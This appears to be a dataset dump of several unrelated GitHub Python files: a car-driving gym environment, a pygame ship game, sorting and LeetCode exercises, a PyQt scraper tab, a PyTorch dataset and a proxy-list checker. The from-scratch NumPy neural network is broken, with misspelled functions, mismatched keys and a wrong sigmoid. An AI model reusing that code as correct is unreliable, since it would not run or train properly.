self.init_dist_to_cp)\n return reward\n\n def is_done(self):\n if self.w.collision_exists()or self.c1.center.x>120 or self.c1.center.y>120 or self.c1.center.y<0 or self.c1.center.x<0:\n self.w.erase_car()\n # self.carlo.w.visualizer.close()\n # self.w.visualizer.close()\n return True\n # if self.c1.speed == 0:\n # return True\n return False\n\n def view(self, window_created: bool):\n self.w.tick() # This ticks the world for one time step (dt second)\n self.w.render(window_created)\n # if self.w.collision_exists() or self.c1.center.x>120 or self.c1.center.y>120 or self.c1.center.y<0 or self.c1.center.x<0:\n #\n # self.w.erase_car()\n\n # time.sleep(dt/4) # Let's watch it 4x\n\n","repo_name":"ArwanC/Self-Driving-Car-DRL","sub_path":"self_driving_car/gym_game/envs/Carlo_intersect.py","file_name":"Carlo_intersect.py","file_ext":"py","file_size_in_byte":19455,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"71860975261","text":"import numpy as np \n\nclass NeuralNetwork:\n def __init__(self, sizes, activation=\"relu\"):\n self.sizes = sizes\n\n self.activation = self.relu if activation == \"relu\" else self.sigmoid\n \n # weights\n self.params = self.begin()\n # cache activations\n self.cache = {}\n\n def begin(self):\n input_layer = self.sizes[0]\n hidden_layer = self.sizes[1]\n output_layer = self.sizes[2]\n\n return {\n \"W1\": np.random.randn(hidden_layer, input_layer) * np.sqrt(1. / hidden_layer),\n \"B1\": np.random.randn(hidden_layer, 1) * np.sqrt(1. / hidden_layer),\n \"W2\": np.random.randn(output_layer, hidden_layer) * np.sqrt(1. / output_layer),\n \"B2\": np.random.randn(output_layer, 1) * np.sqrt(1. / output_layer)\n }\n \n def momentum_optimizer(self):\n return {\n \"W1\": np.zeros(self.params[\"W1\"].shape),\n \"B1\": np.zeros(self.params[\"B1\"].shape),\n \"W2\": np.zeros(self.params[\"W2\"].shape),\n \"B2\": np.zeros(self.params[\"B2\"].shape),\n }\n\n def sigmoid(self, x, derivative=False):\n if derivative: \n return (np.exp(-x))/((np.exp(-x)+1)**2)\n return 1/(1 + np.exp(-1))\n\n def relu(self, x, derivative=False):\n if derivative: \n x = np.where(x < 0, 0, x)\n x = np.where(x >= 0 , 1, x)\n return x\n return np.maximum(0, x)\n \n def softmax(self, x):\n return np.exp(x-x.max()) / np.sum(np.exp(x-x.max()), axis=0)\n \n def cross_entropy_loss(self,y,output):\n return -(1./y.shape[0]) * np.sum(np.multiply(y.T, np.log(output)))\n \n def forward(self, x):\n self.cache[\"X\"] = x\n self.cache[\"Z1\"] = np.matmul(self.params[\"W1\"], self.cache[\"X\"].T) + self.params[\"b1\"]\n self.cache[\"A1\"] = self.activation(self.cache[\"Z1\"])\n self.cache[\"Z2\"] = np.matmul(self.params[\"W2\"], self.cache[\"A1\"]) + self.params[\"b2\"]\n self.cache[\"A2\"] = self.softmax(self.cache[\"Z2\"])\n return self.cache[\"A2\"]\n \n def backward(self, y, output):\n batch_size = y.shape[0]\n\n dw2 = (1./batch_size) * np.matmal(output-y.T, self.cache[\"A1\"].T)\n db2 = (1./batch_size) * np.sum(output-y.T, axis=1, keepdims=True)\n\n d = np.matmal(self.params[\"W2\"].T, output-y.T) * self.activation(self.cache[\"Z1\"], derivative=True)\n dw1 = (1./batch_size) * np.matmul(d, self.cache[\"X\"])\n db1 = (1./batch_size) * np.sum(d, axis=1, keepdims=True)\n\n return {\n \"W1\": dw1,\n \"B1\": db1,\n \"W2\": dw2,\n \"B2\": db2\n }\n \n def accurancy(self, y, out):\n return np.mean(np.argmax(y, axis=0) == np.argmax(out, axis=0))\n \n\nnn = NeuralNetwork()","repo_name":"mustafaaljadery/deep-nn-scratch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14782009140","text":"\"\"\"Module containing ship classes\"\"\"\r\nimport pygame, time\r\nfrom random import randint\r\nfrom modules import sounds\r\nfrom modules import animation\r\npygame.init()\r\npygame.mixer.init(frequency=22050, size=-16, channels=2, buffer=4096)\r\n\r\nclass MainShip:\r\n \"\"\"Main class containing the base values & methods\"\"\"\r\n def __init__(self, name, x, y, color = 'red'):\r\n self.name = name\r\n self.x = x\r\n self.y = y\r\n self.size = 0\r\n self.health = 0\r\n self.move_ship = 0\r\n self.select = False\r\n self.direction = 0\r\n self.image = ''\r\n self.dead_image = ''\r\n self.attack_count = 0\r\n\r\n self.offensive_range = 0\r\n self.defensive_range = 0\r\n self.damage = 1\r\n self.vertical = True\r\n\r\n self.deactivate = False\r\n self.deactivate = True\r\n\r\n def set_select(self):\r\n if(self.select):\r\n self.select = False\r\n else:\r\n self.select = True\r\n\r\n def unset_select(self):\r\n self.select = False\r\n\r\n def get_select(self):\r\n return self.select\r\n\r\n def get_size(self):\r\n return self.size\r\n\r\n def get_deactivate(self):\r\n return self.deactivate\r\n\r\n def set_deactivate(self):\r\n self.deactivate = True\r\n\r\n def unset_deactivate(self):\r\n self.deactivate = False\r\n\r\n def get_deactivated(self):\r\n return self.deactivated\r\n\r\n def set_deactivated(self):\r\n self.deactivated = True\r\n\r\n def unset_deactivated(self):\r\n self.deactivated = False\r\n\r\n def canGoHere(self, pos, list_player1, list_player2):\r\n\r\n for ship in list_player1:\r\n if not ship == self:\r\n if self.vertical:\r\n if pos[0] == ship.x:\r\n if pos[1] >= ship.y - (self.get_size() - 1) and pos[1] <= ship.y + ship.size - 1:\r\n return False\r\n else:\r\n if pos[1] == ship.y:\r\n if pos[0] >= ship.x - (self.get_size() - 1) and pos[0] <= ship.x + ship.size - 1:\r\n print(\r\n \"Could not move ship {} (pos {} {}) because its colliding with ship {} (pos {} {})\".format(\r\n self.name, self.x, self.y, ship.name, ship.x, ship.y))\r\n return False\r\n\r\n for ship in list_player2:\r\n if not ship == self:\r\n if self.vertical:\r\n if pos[0] == ship.x:\r\n if pos[1] >= ship.y - (self.get_size() - 1) and pos[1] <= ship.y + ship.size - 1:\r\n return False\r\n else:\r\n if pos[1] == ship.y:\r\n if pos[0] >= ship.x - (self.get_size() - 1) and pos[0] <= ship.x + ship.size - 1:\r\n print(\r\n \"Could not move ship {} (pos {} {}) because its colliding with ship {} (pos {} {})\".format(\r\n self.name, self.x, self.y, ship.name, ship.x, ship.y))\r\n return False\r\n elif pos[0] == ship.x:\r\n if pos[1] >= ship.y - (self.get_size() - 1) and pos[0] <= ship.y + ship.size - 1:\r\n print(\r\n \"Could not move ship {} (pos {} {}) because its colliding with ship {} (pos {} {})\".format(\r\n self.name, self.x, self.y, ship.name, ship.x, ship.y))\r\n return False\r\n\r\n return True\r\n\r\n def get_ship_list_cords(self, Player, p, get_ship = False):\r\n ship_list = []\r\n try:\r\n ships = Player.get_saved_ships()\r\n except AttributeError:\r\n ships = [Player]\r\n\r\n for ship in ships:\r\n if ship == self:\r\n continue\r\n\r\n full_ship = []\r\n if(ship.check_if_vertical()):\r\n for i in range(ship.get_size()):\r\n full_ship.append((ship.x, p(ship.y, i)))\r\n else:\r\n for i in range(ship.get_size()):\r\n full_ship.append((p(ship.x, i), ship.y))\r\n\r\n if(get_ship):\r\n ship_list.append({\r\n 'ship': ship,\r\n 'coords': full_ship\r\n })\r\n else:\r\n ship_list.append(full_ship)\r\n\r\n return ship_list\r\n\r\n def get_ship(self):\r\n full_ship = []\r\n for i in range(self.get_size()):\r\n if(self.check_if_vertical()):\r\n full_ship.append((self.x, self.y + i))\r\n else:\r\n full_ship.append((self.x + i, self.y))\r\n\r\n return full_ship\r\n\r\n def check_colsion(self, player1, player2):\r\n\r\n ships_player_1 = self.get_ship_list_cords(player1, lambda x, y: x + y, False)\r\n ships_player_2 = self.get_ship_list_cords(player2, lambda x, y: x + y, False)\r\n\r\n ship = self.get_ship()\r\n\r\n for ship_player_1 in ships_player_1:\r\n if(set(ship_player_1).intersection(set(ship))):\r\n return True\r\n\r\n for ship_player_2 in ships_player_2:\r\n if(set(ship_player_2).intersection(set(ship))):\r\n return True \r\n\r\n return False\r\n\r\n\r\n def locate_enemy_ships(self, Turn, Enemy):\r\n Player = Turn.get_player()\r\n if self.check_if_vertical():\r\n ship_range = self.offensive_range\r\n else:\r\n ship_range = self.defensive_range\r\n\r\n enemy_ship_list = self.get_ship_list_cords(Enemy, lambda x, y: x + y, True)\r\n\r\n ship_range_cords = []\r\n\r\n for i in range(ship_range + 1):\r\n if(self.check_if_vertical()):\r\n # top\r\n ship_range_cords.append((self.x, self.y - i))\r\n # bottom\r\n ship_range_cords.append((self.x, (self.y + self.size) + i)) \r\n else:\r\n # top \r\n ship_range_cords.append((self.x - i, self.y))\r\n # bottom\r\n ship_range_cords.append(((self.x + self.size) + i, self.y))\r\n\r\n for a in range(self.size):\r\n if(self.check_if_vertical()):\r\n # left \r\n ship_range_cords.append((self.x - i, self.y + a))\r\n # right\r\n ship_range_cords.append((self.x + i, self.y + a))\r\n else:\r\n # left \r\n ship_range_cords.append((self.x + a, self.y - i))\r\n # right\r\n ship_range_cords.append((self.x + a, self.y - i)) \r\n\r\n ships_in_range = []\r\n for enemy_ship in enemy_ship_list:\r\n if(set(enemy_ship['coords']).intersection(set(ship_range_cords))):\r\n ships_in_range.append(enemy_ship['ship'])\r\n\r\n return ships_in_range\r\n\r\n\r\n def movement(self, event, player1, player2, Other_player = None):\r\n\r\n chkgame = sounds.sounds.check_gamesound()\r\n \"\"\"Allows for movement on the grid\"\"\"\r\n # if select:\r\n # print(\"You selected: \" + self.name)\r\n # print(str(self.move_ship) + \" move(s) left for this ship.\")\r\n if(Other_player):\r\n mines = Other_player.get_mines() \r\n \"\"\"Loops through until select returns false\"\"\"\r\n\r\n if self.move_ship > 0:\r\n if self.vertical == True and not self.dead and not self.deactivated:\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_UP:\r\n if chkgame == True:\r\n sounds.Sounds().waves()\r\n self.y -= 1\r\n self.move_ship -= 1\r\n self.direction = 1\r\n if(self.check_colsion(player1, player2) or self.y < 1):\r\n self.y +=1\r\n self.move_ship += 1\r\n time.sleep(0.15) \r\n elif event.key == pygame.K_LEFT:\r\n if chkgame == True:\r\n sounds.Sounds().waves()\r\n self.x -= 1\r\n self.move_ship -= 1\r\n self.direction = 2\r\n if(self.check_colsion(player1, player2) or self.x < 1):\r\n self.x += 1\r\n self.move_ship += 1\r\n\r\n time.sleep(0.15) \r\n elif event.key == pygame.K_RIGHT:\r\n if chkgame == True:\r\n sounds.Sounds().waves()\r\n self.x += 1\r\n self.move_ship -= 1\r\n self.direction = 3\r\n if(self.check_colsion(player1, player2) or self.x > 20):\r\n self.x -= 1\r\n self.move_ship += 1\r\n\r\n time.sleep(0.15) \r\n elif event.key == pygame.K_DOWN:\r\n if chkgame == True:\r\n sounds.Sounds().waves()\r\n self.y += 1\r\n self.move_ship -= 1\r\n self.direction = 4\r\n if(self.check_colsion(player1, player2) or self.y > (21 - self.get_size())):\r\n self.y -= 1\r\n self.move_ship += 1\r\n\r\n time.sleep(0.15) \r\n elif event.key == pygame.K_l:\r\n if player1.get_id() == 1:\r\n if chkgame == True:\r\n sounds.Sounds().turn_defensive_red()\r\n else:\r\n if chkgame == True:\r\n sounds.Sounds().turn_defensive_blue()\r\n self.move_ship -= 1\r\n self.turn_ship()\r\n if(self.check_colsion(player1, player2) or self.x > (21 - self.get_size())):\r\n self.move_ship += 1\r\n self.turn_ship() \r\n time.sleep(0.15)\r\n elif self.vertical == False and not self.dead:\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_l:\r\n if player1.get_id() == 1:\r\n if chkgame == True:\r\n sounds.Sounds().turn_offensive_red()\r\n else:\r\n if chkgame == True:\r\n sounds.Sounds().turn_offensive_blue()\r\n self.move_ship -= 1\r\n self.turn_ship()\r\n if(self.check_colsion(player1, player2)):\r\n self.move_ship += 1\r\n self.turn_ship()\r\n\r\n time.sleep(0.15)\r\n\r\n # check if ship hits a mine\r\n ship = self.get_ship()\r\n for mine in mines:\r\n if(set([mine]).intersection(set(ship))):\r\n Other_player.delete_mine(mine)\r\n dead = self.take_damage(1)\r\n if(dead):\r\n return dead\r\n if chkgame == True:\r\n sounds.Sounds().biem()\r\n\r\n def position(self):\r\n \"\"\"Turns ship 180 degrees, allowing for offensive and defensive positioning\"\"\"\r\n self.x = self.x - 1\r\n self.y = self.y\r\n\r\n def get_health(self):\r\n return self.health\r\n\r\n def add_health(self, health):\r\n self.health += health\r\n\r\n def get_moves(self):\r\n return self.move_ship\r\n\r\n def add_moves(self, moves):\r\n self.move_ship += moves\r\n\r\n def get_name(self):\r\n return self.name\r\n\r\n def get_offensive_range(self):\r\n return self.offensive_range\r\n\r\n def add_offensive_range(self, number):\r\n self.offensive_range += number\r\n\r\n def get_defensive_range(self):\r\n return self.defensive_range\r\n\r\n def add_defensive_range(self, number):\r\n self.defensive_range += number\r\n\r\n def add_range(self, number):\r\n self.add_offensive_range(number)\r\n self.add_defensive_range(number)\r\n\r\n def get_damage(self):\r\n return self.damage\r\n\r\n def add_damage(self, number):\r\n self.damage += number\r\n\r\n def take_damage(self, number):\r\n self.health -= number\r\n if(self.health <= 0):\r\n self.image = self.dead_image\r\n self.dead = True\r\n return self.dead\r\n\r\n def check_if_dead(self):\r\n return self.dead\r\n\r\n def add_attack_count(self, number):\r\n self.attack_count += number\r\n\r\n def subtract_attack_count(self, number):\r\n self.attack_count -= number\r\n\r\n def get_attack_count(self):\r\n return self.attack_count\r\n\r\n def get_image(self):\r\n return self.image\r\n\r\n def check_if_vertical(self):\r\n return self.vertical\r\n\r\n def turn_ship(self):\r\n if self.vertical:\r\n self.vertical = False\r\n else:\r\n self.vertical = True\r\n\r\nclass Saltire(MainShip):\r\n \"\"\"Furgo Saltire & Santa Bettina class.\"\"\"\r\n def __init__(self, name, x, y, color = 'red'):\r\n super().__init__(name, x, y, color)\r\n self.name = name\r\n self.x = x -100\r\n self.y = y\r\n self.health = 2\r\n self.size = 2\r\n self.move_ship = 3\r\n self.offensive_range = 2\r\n self.defensive_range = 3\r\n self.damage = 1\r\n self.attack_count = 1\r\n self.ship_number = 1\r\n if(color == 'red'):\r\n self.image = \"assets/boats/BoatR_1.png\"\r\n else:\r\n self.image = \"assets/boats/BoatB_1.png\"\r\n\r\n self.dead_image = \"assets/boats/BoatG_1.png\"\r\n self.dead = False \r\n self.deactivate = False\r\n self.deactivated = False\r\n def get_ship_number(self):\r\n return self.ship_number\r\n def reset(self):\r\n self.move_ship = 3\r\n self.offensive_range = 2\r\n self.defensive_range = 3\r\n self.damage = 1\r\n self.attack_count = 1\r\n self.unset_deactivate()\r\n self.unset_deactivated()\r\n\r\nclass Windsurf(MainShip):\r\n \"\"\"Silver Whisper, Windsurf, Sea Spirit & Intensity class\"\"\"\r\n def __init__(self, name, x, y, color = 'red'):\r\n super().__init__(name, x, y, color)\r\n self.name = name\r\n self.x = x - 100\r\n self.y = y\r\n self.health = 3\r\n self.size = 3\r\n self.move_ship = 2\r\n self.offensive_range = 3\r\n self.defensive_range = 4\r\n self.damage = 1\r\n self.attack_count = 1\r\n self.ship_number = 2\r\n if(color == 'red'):\r\n self.image = \"assets/boats/BoatR_2.png\" \r\n else:\r\n self.image = \"assets/boats/BoatB_2.png\"\r\n\r\n self.dead_image = \"assets/boats/BoatG_2.png\"\r\n self.dead = False\r\n self.deactivate = False\r\n self.deactivated = False \r\n\r\n def reset(self):\r\n self.move_ship = 2\r\n self.offensive_range = 3\r\n self.defensive_range = 4\r\n self.damage = 1\r\n self.attack_count = 1\r\n self.unset_deactivate()\r\n self.unset_deactivated()\r\n\r\nclass Amadea(MainShip):\r\n \"\"\"Amadea & Merapi class\"\"\"\r\n def __init__(self, name, x, y, color = 'red'):\r\n super().__init__(name, x, y, color)\r\n self.name = name\r\n self.x = x - 100\r\n self.y = y\r\n self.health = 4\r\n self.size = 4\r\n self.move_ship = 1\r\n self.offensive_range = 4\r\n self.defensive_range = 5\r\n self.damage = 1\r\n self.attack_count = 1\r\n self.ship_number = 3\r\n if(color == 'red'):\r\n self.image = \"assets/boats/BoatR_3.png\"\r\n else:\r\n self.image = \"assets/boats/BoatB_3.png\"\r\n\r\n self.dead_image = \"assets/boats/BoatG_3.png\"\r\n self.dead = False\r\n self.deactivate = False\r\n self.deactivated = False\r\n\r\n def reset(self):\r\n self.move_ship = 1\r\n self.offensive_range = 4\r\n self.defensive_range = 5\r\n self.damage = 1\r\n self.attack_count = 1\r\n self.unset_deactivate()\r\n self.unset_deactivated()\r\n\r\n","repo_name":"sanderbakker/Project-2-Battleport-INF1F-Groep-2","sub_path":"modules/ships.py","file_name":"ships.py","file_ext":"py","file_size_in_byte":16546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"18838020608","text":"import collections\r\nclass Solution:\r\n def findMaxLength1(self, nums) -> int:\r\n print(nums)\r\n res = 0\r\n idx = 0\r\n chk_lst = []\r\n while(idx < len(nums)):\r\n bin_ctr = 1\r\n check_val = nums[idx]\r\n print(\"chek \", idx)\r\n for i in range(idx + 1 , len(nums)):\r\n if(nums[i] == check_val):\r\n bin_ctr +=1\r\n else:\r\n break\r\n sub_idx = bin_ctr+bin_ctr\r\n print(\"idx \" , idx)\r\n sub_arr = nums[bin_ctr:bin_ctr+bin_ctr]\r\n print(\"sub_arr :\" , sub_arr)\r\n \r\n print(\"lst :\" , chk_lst)\r\n if check_val == 0 :\r\n if(sub_arr.count(1) == bin_ctr and len(chk_lst) == 0 and sub_arr != chk_lst):\r\n print(sub_arr , \" :: \" ,chk_lst , \" :: \" ,sub_idx)\r\n res +=sub_idx\r\n else: \r\n if(sub_arr.count(0) == bin_ctr and len(chk_lst) == 0 and sub_arr != chk_lst):\r\n print(\"else :: \" ,sub_arr , \" :: \" ,chk_lst , \" :: \" ,sub_idx)\r\n res +=1\r\n \r\n if sub_arr not in chk_lst:\r\n chk_lst.append(sub_arr)\r\n idx += 1\r\n return res\r\n \r\n\r\n def findMaxLength(self, nums) -> int:\r\n dict_subarr = collections.defaultdict(int)\r\n max_length = 0\r\n count = 0\r\n dict_subarr[0] = -1\r\n for i in range(0 , len(nums)):\r\n print(\"ele :: \" , nums[i])\r\n if nums[i] == 0:\r\n count -= 1 \r\n else:\r\n count += 1 \r\n print(\"count value :: \" , count)\r\n\r\n if(count in dict_subarr.keys()):\r\n print(\"dict keys :: \" , dict_subarr.keys())\r\n print(\"dict vals :: \" , dict_subarr.values())\r\n print(\"max_length :: \" , max_length)\r\n print(\"vallll :: , iteration num \", i ,\" :: \" , \"key ::\" ,count , \":: dict \", dict_subarr[count] ,\"sub ::\" , i- dict_subarr[count])\r\n max_length = max(max_length , i-dict_subarr[count])\r\n \r\n else:\r\n dict_subarr[count] = i\r\n return max_length\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nprint(Solution().findMaxLength([0,1,0,0,1,1,0]))","repo_name":"uthambathoju/30days_leetcode_april_challenge","sub_path":"contiguos_array.py","file_name":"contiguos_array.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"27088379729","text":"import numpy as np\r\nimport time\r\n\r\ndef insertionSort(veriMiktari):\r\n veriDizini = np.random.randint(0, 100000, veriMiktari)\r\n copyveriDizini = veriDizini.copy()\r\n start = time.time()\r\n islemSayisi = 0\r\n \r\n for i in range(1, veriMiktari):\r\n islemSayisi +=2\r\n key = veriDizini[i]\r\n j = i - 1\r\n \r\n while 0 <= j and key < veriDizini[j]:\r\n islemSayisi += 3\r\n veriDizini[j + 1] = veriDizini[j]\r\n j -= 1\r\n veriDizini[j + 1] = key\r\n \r\n return veriDizini, islemSayisi, time.time()-start, copyveriDizini","repo_name":"Mahmut-OGUTCU/Algoritma_Analizi_ve_Tasarimi","sub_path":"SiralamaAlgoritmalari/insertionSort.py","file_name":"insertionSort.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"18295869942","text":"import os\nimport sys\n\nfrom PyQt5 import QtCore\nfrom PyQt5.QtCore import QThread, pyqtSignal, QEventLoop, QTimer\nfrom PyQt5.QtGui import QTextCursor\nfrom PyQt5.QtWidgets import QWidget, QTextEdit, QVBoxLayout, QHBoxLayout, QPushButton, QLineEdit, QCheckBox, \\\n QFileDialog, QMessageBox, QGroupBox, QApplication\nfrom KSVS_Moudle.utils.KSVS import runGetUserDetail,runGetUserId\nfrom KSVS_Moudle.utils.DataGrid import DataGrid\n\nclass UserDetailThread(QThread):\n user_detail_signal = pyqtSignal(str)\n def __init__(self,data=None, parent=None):\n super(UserDetailThread, self).__init__(parent)\n self.data = data\n\n def write(self, text):\n self.user_detail_signal.emit(str(text)) # 发射信号\n\n def run(self):\n runGetUserId()\n print(\"userID抓取完成,开始抓取用户信息\")\n runGetUserDetail()\n print(\"用户信息抓取完成\")\n self.exit(0) # 关闭线程\n def stop(self):\n os._exit(0)\nclass getUserDetailTab(QWidget):\n def __init__(self):\n super(getUserDetailTab, self).__init__()\n self.resize(500,300)\n self.initUI()\n\n def initUI(self):\n self.processBar()\n self.process = QTextEdit(self, readOnly=True)\n self.process.ensureCursorVisible()\n self.process.setLineWrapColumnOrWidth(1000)\n self.process.setLineWrapMode(QTextEdit.FixedPixelWidth)\n main_layout = QVBoxLayout()\n main_layout.addLayout(self.process_layout)\n main_layout.addWidget(self.process)\n self.setLayout(main_layout)\n def dataBox(self):\n self.data_box = QGroupBox(\"数据\",self)\n self.data_box.setFlat(True)\n data_layout = QVBoxLayout()\n self.show_file_layout = QHBoxLayout()\n self.process_file_layout = QHBoxLayout()\n self.filePathlineEdit = QLineEdit(self)\n self.filePathlineEdit.setObjectName(\"filePathlineEdit\")\n self.open_file_button = QPushButton(\"导入数据\", self)\n self.open_file_button.clicked.connect(self.openFile)\n self.check_import_box = QCheckBox(self)\n from KSVS_Moudle.utils.importToDb import KSUserData\n if KSUserData.table_exists():\n self.check_import_box.setChecked(True)\n self.open_file_button.setDisabled(True)\n else:\n self.check_import_box.setChecked(False)\n self.open_file_button.setDisabled(False)\n self.check_import_box.setDisabled(True)\n self.show_file_layout.addWidget(self.filePathlineEdit)\n self.show_file_layout.addWidget(self.check_import_box)\n clean_db_button = QPushButton(\"清空数据\",self)\n clean_db_button.clicked.connect(self.cleanFile)\n self.process_file_layout.addWidget(self.open_file_button)\n self.process_file_layout.addWidget(clean_db_button)\n self.process_file_layout.addStretch(0.1)\n self.process_file_layout.setSpacing(20)\n\n data_layout.addLayout(self.show_file_layout)\n data_layout.addLayout(self.process_file_layout)\n data_layout.setSpacing(10)\n self.data_box.setLayout(data_layout)\n\n def runBox(self):\n run_layout = QVBoxLayout()\n self.run_box = QGroupBox(\"运行\",self)\n self.run_box.setFlat(True)\n show_user_detail_button = QPushButton(\"查看用户信息\", self)\n show_user_detail_button.clicked.connect(self.showUserDetail)\n get_user_detail_button = QPushButton(\"开始抓取\", self)\n get_user_detail_button.clicked.connect(self.crawlUserDetail)\n run_layout.addWidget(self.data_box)\n run_layout.addWidget(get_user_detail_button)\n run_layout.addWidget(show_user_detail_button)\n # self.top_layout.addWidget(stop_user_detail_button)\n run_layout.setSpacing(10)\n self.run_box.setLayout(run_layout)\n def processBar(self):\n self.dataBox()\n self.runBox()\n self.process_layout = QHBoxLayout()\n self.process_layout.addWidget(self.data_box)\n self.process_layout.addWidget(self.run_box)\n self.process_layout.setStretch(0,3)\n self.process_layout.setStretch(1,1)\n def openFile(self):\n # self.filePathlineEdit.setText(str(get_directory_path))\n self.get_filename_path, ok = QFileDialog.getOpenFileName(self,\n \"选取单个文件\",\n \"../basicdata\",\n \"All Files (*);;Text Files (*.txt)\")\n if ok:\n self.filePathlineEdit.setText(str(self.get_filename_path))\n from KSVS_Moudle.utils.importToDb import importUserName2Db\n import_success = importUserName2Db(str(self.get_filename_path))\n if import_success:\n QMessageBox.information(self,\"提示\",\"成功导入数据!\",QMessageBox.Ok)\n self.check_import_box.setChecked(True)\n else:\n QMessageBox.information(self, \"提示\", \"导入失败,请检查数据!\",QMessageBox.Ok)\n self.check_import_box.setChecked(False)\n def cleanFile(self):\n from KSVS_Moudle.utils.importToDb import db,KSUserData,KSVideoData\n db.drop_tables((KSUserData,KSVideoData))\n if not db.table_exists(KSUserData) and not db.table_exists(KSVideoData):\n QMessageBox.information(self, \"提示\", \"数据已清空!\")\n self.check_import_box.setChecked(False)\n self.open_file_button.setDisabled(False)\n def onUpdateUserDetailText(self, text):\n cursor = self.process.textCursor()\n cursor.movePosition(QTextCursor.End)\n cursor.insertText(text)\n self.process.setTextCursor(cursor)\n self.process.ensureCursorVisible()\n\n def crawlUserDetail(self):\n try:\n self.user_detail_th = UserDetailThread()\n self.user_detail_th.user_detail_signal.connect(self.onUpdateUserDetailText)\n sys.stdout = self.user_detail_th\n self.user_detail_th.start()\n except Exception as e:\n raise e\n loop = QEventLoop()\n QTimer.singleShot(2000, loop.quit)\n loop.exec_()\n def showUserDetail(self):\n self.dg = DataGrid(\"用户信息\",\"KSUserData\")\n self.dg.show()\n def stopCrawlUserDetail(self):\n # self.user_detail_th.stop()\n os._exit(0)\n def changeEvent(self, a0: QtCore.QEvent) -> None:\n pass\n # def closeEvent(self, event):\n # \"\"\"Shuts down application on close.\"\"\"\n # # Return stdout to defaults.\n # sys.stdout = sys.__stdout__\n # super().closeEvent(event)","repo_name":"nuclear-turning/spider","sub_path":"KSVS_WX/KSVS_Moudle/tabs/GetUserDetailTab.py","file_name":"GetUserDetailTab.py","file_ext":"py","file_size_in_byte":6668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"70680015901","text":"import os\r\nimport torch\r\nimport cv2\r\nimport torch.utils.data.dataset\r\nfrom pandas import DataFrame\r\nfrom pathlib import Path\r\nfrom typing import Tuple\r\n\r\nfrom transforms import transform\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom torchvision import datasets, models, transforms\r\nfrom PIL import Image\r\n\r\nclass Classification_Dataset(torch.utils.data.Dataset):\r\n def __init__(self,\r\n dataframe=None,\r\n labels:dict ={},\r\n trans=None,\r\n shuffle: bool = True,\r\n tile_size: Tuple = (256,256),\r\n show_image: bool = False,\r\n ):\r\n \r\n self.dataframe = dataframe\r\n self.labels = labels\r\n self.trans = trans\r\n self.shuffle = shuffle\r\n self.tile_size = tile_size\r\n self.show_image = show_image\r\n self.label_enc = LabelEncoder()\r\n self.label_enc.fit(list(self.labels.values()))\r\n\r\n def __len__(self):\r\n return len(self.dataframe.index)\r\n\r\n def __getitem__(self, idx):\r\n item = self.dataframe.iloc[idx]\r\n img_path = item['path']\r\n convert_to_tensor = transforms.ToTensor()\r\n img = cv2.cvtColor(cv2.imread(img_path), cv2.COLOR_BGR2RGB)\r\n tensor_img = convert_to_tensor(img)\r\n\r\n if self.trans:\r\n img = self.trans(tensor_img)\r\n\r\n label = self.label_enc.transform([item['label']])\r\n # print(\"image shape\", img.shape, \"label:\" ,[item['label']])\r\n # print(\"label shape : \" ,label.shape)\r\n\r\n return {'image': img,\r\n 'label': torch.tensor(label, dtype=torch.long)\r\n }\r\n\r\n\r\n\r\n","repo_name":"Er3en/image_classification","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"11726408433","text":"from sys import stdin\n\ns_in = list(stdin.readline().strip())\n\nsum = 0\nfor a in s_in:\n sum += (ord(a.upper()) - 64)\n# print(sum)\nis_prime = True\nfor i in range(2, sum):\n if sum % i == 0:\n is_prime = False\n\nprint('It is a prime word.') if is_prime else print('It is not a prime word.')\n","repo_name":"sejongkang/Baekjoon_programming","sub_path":"8.소수/2153_소수단어.py","file_name":"2153_소수단어.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"40065499314","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n__author__ = \"Nikolay Nezhevenko \"\n\n\nimport os\n\nfrom lib.parseproxytables import parse_free_proxy_list_net, parse_freeproxylists_net,\\\n parse_hidemy_name, parse_proxylist_hidemyass_com, save_proxy_list\nfrom lib.check_proxies import main as check_proxies_main\n\n\nCONFIG = {\n 'data_path': './data',\n 'storage_path': './storage',\n 'temp_file_with_all_proxies': 'all_proxies.txt',\n 'free_proxy_list_net_file': 'new_proxies.free-proxy-list.net.txt',\n 'freeproxylists_net_file': 'new_proxies.freeproxylists.net.txt',\n 'hidemy_name_file': 'new_proxies.hidemy.name.txt',\n 'proxylist_hidemyass_com_file': 'new_proxies.proxylist.hidemyass.com.txt',\n 'url_for_check': \"http://stackoverflow.com/questions\",\n 'timeout': \"5\",\n 'threads': \"16\"\n}\n\n\ndef get_total_proxy_list():\n all_proxies = list()\n all_proxies.extend(parse_free_proxy_list_net(os.path.join(CONFIG['data_path'], CONFIG['free_proxy_list_net_file'])))\n all_proxies.extend(parse_freeproxylists_net(os.path.join(CONFIG['data_path'], CONFIG['freeproxylists_net_file'])))\n all_proxies.extend(parse_hidemy_name(os.path.join(CONFIG['data_path'], CONFIG['hidemy_name_file'])))\n all_proxies.extend(parse_proxylist_hidemyass_com(os.path.join(CONFIG['data_path'], CONFIG['proxylist_hidemyass_com_file'])))\n\n return sorted(list(set(all_proxies)))\n\n\ndef print_total_proxy_list(proxies):\n for proxy in proxies:\n print(proxy)\n\n\nif __name__ == '__main__':\n proxies = get_total_proxy_list()\n print('Total proxy count to validate: %s' % len(proxies))\n 